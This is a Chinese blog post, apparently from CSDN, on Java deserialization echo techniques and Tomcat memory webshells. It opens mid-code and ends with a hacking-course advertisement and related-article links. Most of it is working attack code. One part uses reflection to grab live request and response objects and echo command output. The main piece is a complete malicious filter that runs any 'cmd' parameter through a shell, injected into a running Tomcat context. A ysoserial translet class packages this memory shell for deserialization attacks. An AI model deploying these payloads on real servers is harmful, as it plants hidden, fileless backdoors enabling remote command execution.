2024年最全Java安全之反序列化回显与内存码

于 2024-05-02 23:55:25 发布
阅读量58 收藏 16
点赞数 25
分类专栏: 程序员 文章标签: java 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84301389/article/details/138403461
版权

response2.getWriter().write(“111”);

}

}

}

} catch (NoSuchFieldException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

} catch (IllegalAccessException e) {

e.printStackTrace();

} catch (NoSuchMethodException e) {

e.printStackTrace();

} catch (InvocationTargetException e) {

e.printStackTrace();

}

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

this.doPost(request, response);

}

}

image.png

这里是借助了获取到的Request和Response来输出结果。再来修改一下代码。

package com;

import org.apache.catalina.Context;

import org.apache.catalina.Service;

import org.apache.catalina.connector.Connector;

import org.apache.catalina.core.ApplicationContext;

import org.apache.catalina.core.StandardContext;

import org.apache.catalina.core.StandardService;

import org.apache.coyote.AbstractProtocol;

import org.apache.coyote.RequestGroupInfo;

import org.apache.coyote.RequestInfo;

import org.apache.coyote.Response;

import javax.servlet.ServletContext;

import javax.servlet.ServletException;

import javax.servlet.annotation.WebServlet;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.BufferedInputStream;

import java.io.BufferedOutputStream;

import java.io.IOException;

import java.io.InputStream;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Modifier;

import java.util.ArrayList;

@WebServlet(“/demoServlet”)

public class demoServlet extends HttpServlet {

protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

try {

Field context = Class.forName(“org.apache.catalina.core.StandardContext”).getDeclaredField(“context”);

context.setAccessible(true);

ApplicationContext ApplicationContext = (ApplicationContext)context.get(standardContext);

Field service = Class.forName(“org.apache.catalina.core.ApplicationContext”).getDeclaredField(“service”);

service.setAccessible(true);

StandardService standardService = (StandardService)service.get(ApplicationContext);

Field connectors = Class.forName(“org.apache.catalina.core.StandardService”).getDeclaredField(“connectors”);

connectors.setAccessible(true);

Connector[] connector = (Connector[])connectors.get(standardService);

Field protocolHandler = Class.forName(“org.apache.catalina.connector.Connector”).getDeclaredField(“protocolHandler”);

protocolHandler.setAccessible(true);

// AbstractProtocol abstractProtocol = (AbstractProtocol)protocolHandler.get(connector[0]);

Class<?>[] AbstractProtocol_list = Class.forName(“org.apache.coyote.AbstractProtocol”).getDeclaredClasses();

for (Class<?> aClass : AbstractProtocol_list) {

if (aClass.getName().length()==52){

java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod(“getHandler”,null);

getHandlerMethod.setAccessible(true);

Field globalField = aClass.getDeclaredField(“global”);

globalField.setAccessible(true);

org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null));

Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclaredField(“processors”);

processors.setAccessible(true);

java.util.List RequestInfo_list = (java.util.List) processors.get(requestGroupInfo);

Field req = Class.forName(“org.apache.coyote.RequestInfo”).getDeclaredField(“req”);

req.setAccessible(true);

for (RequestInfo requestInfo : RequestInfo_list) {

org.apache.coyote.Request request1 = (org.apache.coyote.Request )req.get(requestInfo);

org.apache.catalina.connector.Request request2 = ( org.apache.catalina.connector.Request)request1.getNote(1);

org.apache.catalina.connector.Response response2 = request2.getResponse();

response2.getWriter().write(“111”);

InputStream whoami = Runtime.getRuntime().exec(“whoami”).getInputStream();

// BufferedInputStream bufferedInputStream = new BufferedInputStream(whoami);

BufferedInputStream bis = new BufferedInputStream(whoami);

int b ;

while ((b = bis.read())!=-1){

response2.getWriter().write(b);

}

}

}

}

} catch (NoSuchFieldException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

} catch (IllegalAccessException e) {

e.printStackTrace();

} catch (NoSuchMethodException e) {

e.printStackTrace();

} catch (InvocationTargetException e) {

e.printStackTrace();

}

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

this.doPost(request, response);

}

}

image.png

将命令执行结果使用获取到的Request和Response来输出。

坑点记录#

================================================================

  1. 开始想直接获取内部类发现思路不通,后来采用getDeclaredClasses方法获取某类中所有内部的内部类遍历,判断类名传递定位到该类。

  2. 获取global遍历的时候出现了巨坑,直接反射去获取。但是未意识到创建是一个class对象,反射使用get方法必须传递实例。

  3. 获取到Request需要调用request.getNote(1);转换为org.apache.catalina.connector.Request的对象。

  4. fanal修饰变量,需做修改,直接获取报错。

通过调用 org.apache.coyote.Request#getNote(ADAPTER_NOTES) 和 org.apache.coyote.Response#getNote(ADAPTER_NOTES) 来获取 org.apache.catalina.connector.Request 和 org.apache.catalina.connector.Response 对象

文章链接

0x02 Tomcat半通用回显#

============================================================================

基于Tomcat中一种半通用回显方法该篇文来调试一下。

根据前文思路顺着堆栈一路向下查看Request和Response存储位置,只要获取到一个实例即可。

顺着思路,在

org.apache.catalina.core.ApplicationFilterChain位置发现符合条件的变量。

image.png

下面寻找赋值位置,发现在这个位置对request,response进行实例的存储。但是默认为False

image.png

思路如下:

1、反射修改

ApplicationDispatcher.WRAP_SAME_OBJECT,让代码逻辑走到if条件里面

2、初始化lastServicedRequest和lastServicedResponse两个变量,默认为null

3、从lastServicedResponse中获取当前请求response,并且回显内容。

自己尝试构造了一下

package com;

import javax.servlet.ServletException;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.annotation.WebServlet;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.lang.reflect.Field;

import java.lang.reflect.Modifier;

@WebServlet(“/testServlet”)

public class testServlet extends HttpServlet {

protected void doPost(HttpServletRequest request, HttpServletResponse response) {

try {

Field wrap_same_object = Class.forName(“org.apache.catalina.core.ApplicationDispatcher”).getDeclaredField(“WRAP_SAME_OBJECT”);

Field lastServicedRequest = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedRequest”);

Field lastServicedResponse = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedResponse”);

lastServicedRequest.setAccessible(true);

lastServicedResponse.setAccessible(true);

wrap_same_object.setAccessible(true);

//修改final

Field modifiersField = Field.class.getDeclaredField(“modifiers”);

modifiersField.setAccessible(true);

modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);

boolean wrap_same_object1 = wrap_same_object.getBoolean(null);

ThreadLocal requestThreadLocal = (ThreadLocal)lastServicedRequest.get(null);

ThreadLocal responseThreadLocal = (ThreadLocal)lastServicedResponse.get(null);

wrap_same_object.setBoolean(null,true);

lastServicedRequest.set(null,new ThreadLocal<>());

lastServicedResponse.set(null,new ThreadLocal<>());

ServletResponse servletResponse = responseThreadLocal.get();

servletResponse.getWriter().write(“111”);

} catch (Exception e) {

e.printStackTrace();

}

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

this.doPost(request, response);

}

}

同理,可集成到yso中,反序列化命令执行结果借助该servletResponse。

image.png

局限#

==============================================================

在shiro反序列化漏洞的利用中并不能成功,发现request,response的设置是在漏洞触发点之后,所以在触发漏洞执行任意java代码时获取不到我们想要的response。其原因是因为rememberMe功能的实现是使用了自己实现的filter。

0x03 内存马构造#

======================================================================

前文的基于Tomcat实现内存马中只是借助Servlet直接去进行动态添加Filter实现内存马。而实际当中还是需要借助反序列化点来直接打入内存马。

下面再来构造一个完整的。

获取到ApplicationContext调用addFilter方法直接将恶意Filter添加进去发现并不行。

ApplicationContext.addFilter(filterName,new ShellIntInject());

image.png

断点处进行了判断,条件为true,会直接抛出异常。而这时候可以借助反射去进行修改。

Java安全之反序列化回显与内存码

Field state = Class.forName(“org.apache.catalina.util.LifecycleBase”).getDeclaredField(“state”);

state.setAccessible(true);

state.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);

修改完成后,再来看到addFilter中,

this.context.findFilterDef也就是寻找StandardContext中的filterDef,所以我们需要添加到filterConfigs、filterDefs、filterMaps。

在添加filter前,通过反射设置成

LifecycleState.STARTING_PREP,添加完成后,再把其恢复成LifecycleState.STARTE,需要恢复,否则可能导致服务不可用。

image.png

//添加拦截路径,实现是将存储写入到filterMap中

registration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{“/*”});

后面再来看到StandardContext 中filterStart方法会遍历所有filterDefs实例化ApplicationFilterConfig添加到filterConfigs中

this.filterConfigs.clear();

Iterator i$ = this.filterDefs.entrySet().iterator();

while(i$.hasNext()) {

Entry<String, FilterDef> entry = (Entry)i$.next();

String name = (String)entry.getKey();

if (this.getLogger().isDebugEnabled()) {

this.getLogger().debug(" Starting filter ‘" + name + "’");

}

try {

ApplicationFilterConfig filterConfig = new ApplicationFilterConfig(this, (FilterDef)entry.getValue());

this.filterConfigs.put(name, filterConfig);

} catch (Throwable var8) {

Throwable t = ExceptionUtils.unwrapInvocationTargetException(var8);

ExceptionUtils.handleThrowable(t);

this.getLogger().error(sm.getString(“standardContext.filterStart”, new Object[]{name}), t);

ok = false;

}

}

return ok;

}

}

前面我们的调用addfilter方法的时候已经将 对应的filterDef给添加进去,我们只需要调用该方法即可实现filterConfig的添加。

//调用filterStart方法将filterconfig进行添加

Method filterStart = Class.forName(“org.apache.catalina.core.StandardContext”).getMethod(“filterStart”);

filterStart.setAccessible(true);

filterStart.invoke(standardContext,null);

最后,需要将filter位置进行调整。

Java安全之反序列化回显与内存码

image.png

在调试中途,部分代码抛出异常并没有直接执行state.set(standardContext,

org.apache.catalina.LifecycleState.STARTED);会导致tomcat直接503。无法进行正常访问,需重启。

完整代码#

================================================================

package com;

import org.apache.catalina.core.ApplicationContext;

import org.apache.catalina.core.StandardContext;

import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;

import javax.servlet.annotation.WebServlet;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.BufferedInputStream;

import java.io.IOException;

import java.io.InputStream;

import java.lang.reflect.Field;

import java.lang.reflect.Method;

import java.lang.reflect.Modifier;

@WebServlet(“/testServlet”)

public class testServlet extends HttpServlet {

private final String cmdParamName = “cmd”;

private final static String filterUrlPattern = “/*”;

private final static String filterName = “cmdFilter”;

protected void doPost(HttpServletRequest request, HttpServletResponse response) {

try {

Field wrap_same_object = Class.forName(“org.apache.catalina.core.ApplicationDispatcher”).getDeclaredField(“WRAP_SAME_OBJECT”);

Field lastServicedRequest = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedRequest”);

Field lastServicedResponse = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedResponse”);

lastServicedRequest.setAccessible(true);

lastServicedResponse.setAccessible(true);

wrap_same_object.setAccessible(true);

//修改final

Field modifiersField = Field.class.getDeclaredField(“modifiers”);

modifiersField.setAccessible(true);

modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);

boolean wrap_same_object1 = wrap_same_object.getBoolean(null);

ThreadLocal requestThreadLocal = (ThreadLocal)lastServicedRequest.get(null);

ThreadLocal responseThreadLocal = (ThreadLocal)lastServicedResponse.get(null);

wrap_same_object.setBoolean(null,true);

lastServicedRequest.set(null,new ThreadLocal<>());

lastServicedResponse.set(null,new ThreadLocal<>());

ServletResponse servletResponse = responseThreadLocal.get();

ServletRequest servletRequest = requestThreadLocal.get();

ServletContext servletContext = servletRequest.getServletContext(); //这里实际获取到的是ApplicationContextFacade

if (servletContext!=null) {

//编写恶意Filter

class ShellIntInject implements javax.servlet.Filter{

@Override

public void init(FilterConfig filterConfig) throws ServletException {

}

@Override

public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

System.out.println(“s”);

String cmd = servletRequest.getParameter(cmdParamName);

if(cmd!=null) {

String[] cmds = null;

if (System.getProperty(“os.name”).toLowerCase().contains(“win”)) {

cmds = new String[]{“cmd.exe”, “/c”, cmd};

} else {

cmds = new String[]{“sh”, “-c”, cmd};

}

java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();

java.util.Scanner s = new java.util.Scanner(in).useDelimiter(“\a”);

String output = s.hasNext() ? s.next() : “”;

java.io.Writer writer = servletResponse.getWriter();

writer.write(output);

writer.flush();

writer.close();

}

filterChain.doFilter(request, response);

}

@Override

public void destroy() {

}

}

//获取ApplicationContext

Field context = servletContext.getClass().getDeclaredField(“context”);

context.setAccessible(true);

ApplicationContext ApplicationContext = (ApplicationContext)context.get(servletContext);

//获取standardContext

Field context1 = ApplicationContext.getClass().getDeclaredField(“context”);

context1.setAccessible(true);

StandardContext standardContext = (StandardContext) context1.get(ApplicationContext);

//获取LifecycleBase的state修改为org.apache.catalina.LifecycleState.STARTING_PREP

Field state = Class.forName(“org.apache.catalina.util.LifecycleBase”).getDeclaredField(“state”);

state.setAccessible(true);

state.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);

//注册filterName

FilterRegistration.Dynamic registration = ApplicationContext.addFilter(filterName, new ShellIntInject());

//添加拦截路径,实现是将存储写入到filterMap中

registration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{“/*”});

//调用filterStart方法将filterconfig进行添加

Method filterStart = Class.forName(“org.apache.catalina.core.StandardContext”).getMethod(“filterStart”);

filterStart.setAccessible(true);

filterStart.invoke(standardContext,null);

//移动filter为位置到前面

FilterMap[] filterMaps = standardContext.findFilterMaps();

for (int i = 0; i < filterMaps.length; i++) {

if (filterMaps[i].getFilterName().equalsIgnoreCase(filterName)) {

org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i];

filterMaps[i] = filterMaps[0];

filterMaps[0] = filterMap;

break;

}

}

servletResponse.getWriter().write(“Success”);

state.set(standardContext,org.apache.catalina.LifecycleState.STARTED);

}

} catch (Exception e) {

e.printStackTrace();

}

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

this.doPost(request, response);

}

}

但这并未完,虽然我们借助了代码执行获取到Request和Response后构造内存马。但是仍需要修改代码,将代码集成到yso中后,以供反序列化攻击使用。

0x04 改造yso#

======================================================================

将前面代码扣下来,并且继承AbstractTranslet,后面需要使用TemplatesImpl类去动态加载该类。

package ysoserial.exploit;

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import org.apache.catalina.core.ApplicationContext;

import org.apache.catalina.core.StandardContext;

import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;

import java.io.IOException;

import java.lang.reflect.Field;

import java.lang.reflect.Method;

import java.lang.reflect.Modifier;

public class TomcatShellIntInject extends AbstractTranslet {

private final static String cmdParamName = “cmd”;

private final static String filterUrlPattern = “/*”;

private final static String filterName = “cmdFilter”;

static {

try {

Field wrap_same_object = Class.forName(“org.apache.catalina.core.ApplicationDispatcher”).getDeclaredField(“WRAP_SAME_OBJECT”);

Field lastServicedRequest = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedRequest”);

Field lastServicedResponse = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedResponse”);

lastServicedRequest.setAccessible(true);

lastServicedResponse.setAccessible(true);

wrap_same_object.setAccessible(true);

//修改final

Field modifiersField = Field.class.getDeclaredField(“modifiers”);

modifiersField.setAccessible(true);

modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);

modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);

boolean wrap_same_object1 = wrap_same_object.getBoolean(null);

ThreadLocal requestThreadLocal = (ThreadLocal) lastServicedRequest.get(null);

ThreadLocal responseThreadLocal = (ThreadLocal) lastServicedResponse.get(null);

wrap_same_object.setBoolean(null, true);

lastServicedRequest.set(null, new ThreadLocal());

lastServicedResponse.set(null, new ThreadLocal());

ServletResponse servletResponse = responseThreadLocal.get();

ServletRequest servletRequest = requestThreadLocal.get();

ServletContext servletContext = servletRequest.getServletContext(); //这里实际获取到的是ApplicationContextFacade

if (servletContext != null) {

//编写恶意Filter

class ShellIntInject implements Filter {

@Override

public void init(FilterConfig filterConfig) throws ServletException {

}

@Override

public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

String cmd = servletRequest.getParameter(cmdParamName);

if (cmd != null) {

String[] cmds = null;

if (System.getProperty(“os.name”).toLowerCase().contains(“win”)) {

cmds = new String[]{“cmd.exe”, “/c”, cmd};

} else {

cmds = new String[]{“sh”, “-c”, cmd};

}

java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();

java.util.Scanner s = new java.util.Scanner(in).useDelimiter(“\a”);

String output = s.hasNext() ? s.next() : “”;

java.io.Writer writer = servletResponse.getWriter();

writer.write(output);

writer.flush();

writer.close();

}

filterChain.doFilter(servletRequest, servletResponse);

}

@Override

public void destroy() {

}

}

//获取ApplicationContext

Field context = servletContext.getClass().getDeclaredField(“context”);

context.setAccessible(true);

ApplicationContext ApplicationContext = (ApplicationContext) context.get(servletContext);

//获取standardContext

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84301389
关注
  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内存Webshell马详解
悦分享
11-08 4572
内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、进程注入等基于内存的攻击手段也受到了大多数攻击者青睐。内存马是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到。因此内存马近年来越来越被重视,逐渐成为了攻击方的“必备武器”,针对内存马的防护也越来越被重视。
Java序列解决方案.docx
12-19
Java序列解决方案 Java序列解决方案是指在Java中,使用序列来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java序列机制和ClassLoader的使用。 首先,...
Java安全序列内存码,java程序设计项目教程课后题答案
m0_63174420的博客
11-10 422
所以获取request的处理请求是 Connector—>AbstractProtocol$ConnectoinHandler—>global—>RequestInfo—>Request—>Response 而在Tomcat启动过程红会将Connector放入Service中。 而现在获取完成的流程是 StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInf
深入浅出内存
superprintf的博客
07-17 452
上面的都是21年之前的东西了,现在是23年7月,然已经过去了两年半,这两年半里还有很多技术的更新。不过技术更新应该也是针对Tomcat不同版本的增加。关于内存马的利用,也延伸到了其他组件。
内存马检测排查手段
SimoSimoSimo的博客
11-05 2万+
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
一文了解内存
闵行小鱼塘
10-24 3184
随着攻防对抗的博弈愈发激烈,流量分析、EDR等专业安全设备被防守方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,webshell终于进入内存马时代,其关键在于无文件,利用中间件的进程执行恶意代码。本文试图进行一个学习,尽可能搞明白其来龙去脉
shiro-check:Shiro序列利用,内存外壳,检查Burp插件
03-21
四郎检查3.0增加了一些有效载荷,增加了基于过滤器(需要对冰蝎客户端pageContext进行改造)和servlet(部分环境需要把参数据进行URL转码)内存冰蝎的支持。 2.0增加了,及100个键,20个键的扫描选项,利用...
067-JAVA序列基于常见框架_中间件方案.pdf
09-20
JAVA序列漏洞是Java应用程序中常见的安全问题,它允许攻击者通过操纵序列序列过程来执行任意代码,从而获取目标系统的权限。在本文中,我们将深入探讨基于常见框架和中间件的序列方案,以及如何...
shiro_attack:shiro序列进攻综合利用,包含(执行命令注入内存马)
03-11
shiro序列进攻综合利用项目基于javafx,利用shiro序列扩展进行命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot命令执行集成公用集合K1 / K2...
tomcat及servlet内存码、Filter内存码、Listener内存
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-23 1622
文章目录关键要点基于tomcat的内存码tomcat介绍serverserviceconnectorcontainertomcat结构图环境搭建Listener -> Filter -> ServletServletListenerFilterListener内存码listener介绍listener利用Filter内存码Filter介绍Filter利用servlet内存码参考: 内存码,顾名思义,注入内存的webshell,过程中没有文件落地,因此相对来说,发现难度会更高。 关键要点 内存马根
java程序设计项目案例教程题库及答案
m0_63394128的博客
08-04 5787
1、 Java源程序文件的后缀是 *.javaJava字节码文件的后缀名称是 *.class 。2、 Java程序实现可移值性,依靠的是 JVM 。3、 Java语言的三个分支是: JAVA SE 、 JAVA ME 、 JAVA EE 。4、 Java程序由 类 组成,如果Java使用 public class 声明类,则文件名称必须与类名称一致。5、 Java执行是从 main() 方法开始执行的,此方法的完整定
内存马原理及查杀
m0_63081418的博客
08-13 1313
内存马一些基本原理,大佬勿喷
java调用外部程序(Runtime.getRuntime().exec)详解
热门推荐
墨鸦的博客
04-29 3万+
参考:https://blog.csdn.net/tiantang_1986/article/details/51219916 ​ https://blog.csdn.net/km_moon/article/details/84751792 概述 Runtime.getRuntime().exec 用于调用外部可执行程序或系统命令,并重定向外部程序的标准输入、标准输出和标准错误到缓冲池。功能和windows“运行”类似。 格式: Process process = Runtime.getRuntime(
Java内存马基础
m0_46317063的博客
02-05 369
filter内存马基础
【Web】小白友好的Java内存马基础学习笔记
最新发布
uuzeray的博客
02-10 1007
内存马(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存马不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存马的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明的痕迹或文件。此外,由于直接在内存中执行,内存马攻击也更难以被检测和追踪。
java射机制的书_Java 基础 - Java射机制 - 《[Java Web安全] 攻击Java Web应用》 - 书栈网 · BookStack...
weixin_32223631的博客
02-25 219
Java射机制Java射(Reflection)是Java非常重要的动态特性,通过使用射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息,还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。Java射机制是Java语言的动态性的重要体现,也是Java的各种框架底层实现的灵魂。获取Class对象J...
Runtime.getRuntime().exec()
yz18931904的博客
09-02 2631
此方法返一个java.lang.Process对象,该对象可以得到之前开启的进程的运行结果,还可以操作进程的输入输出流。 Process对象有以下几个方法:   1、destroy()      杀死这个子进程   2、exitValue()      得到进程运行结束后的返状态   3、waitFor()       得到进程运行结束后的返状态,如果进程未运行完毕则等待知道执行完毕   4、getInputStream()  得到进程的标准输出信息流   5、getErrorStream
JAVA序列基于常见框架/中间件方案
问题很多的小明
08-27 1582
0x00概述 JAVA序列漏洞是JAVA中最常见的可以直接获取目标权限的漏洞,通过序列的思路也是越来越多,如通过远程加载、在目标网站写文件、通过URLClassLoader、借助dnslog等。这些思路多少都有些瓶颈。一旦遇到了目标因网络策略严格无法出外网,则需要借助Dnslog的打法效果会失效,如果可以直观的返命令执行结果,那岂不是更香? 0x01知识点 Tomcat处理流程 在tomcat自己实现的Servlet处打断点,观察tomcat调用栈大致执行流程: 调用过程
java序列学习.doc
07-08
java序列学习.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值